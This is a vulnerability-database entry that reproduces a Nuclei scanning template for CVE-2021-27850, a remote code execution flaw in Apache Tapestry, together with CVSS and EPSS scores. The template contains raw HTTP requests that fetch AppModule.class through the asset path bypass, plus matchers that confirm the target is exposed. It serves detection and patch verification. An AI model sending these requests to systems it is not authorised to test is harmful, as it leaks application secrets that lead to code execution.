Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27850
HistoryMay 21, 2021 - 3:34 a.m.

Apache Tapestry - Remote Code Execution

2021-05-2103:34:16
ProjectDiscovery
github.com
5

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
id: CVE-2021-27850

info:
  name: Apache Tapestry - Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Apache to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
    - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E
    - http://www.openwall.com/lists/oss-security/2021/04/15/1
    - https://security.netapp.com/advisory/ntap-20210528-0002/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27850
    cwe-id: CWE-502,CWE-200
    epss-score: 0.97388
    epss-percentile: 0.99903
    cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: tapestry
  tags: cve,cve2021,apache,tapestry

http:
  - raw:
      - |
        GET /assets/app/something/services/AppModule.class/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'application/java'

      - type: word
        part: body
        words:
          - 'configuration'
          - 'webtools'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: id
        group: 1
        regex:
          - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
        internal: true
        part: header
# digest: 490a00463044022070f0c04ecf3a9fd26ce9b1691219435ab15f0cd55e185ba3586553743c17e82d02205e3a8a905f69891dc2c1c5b7651a0e91c63afc906d36ebdcd6425467650c5ab1:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%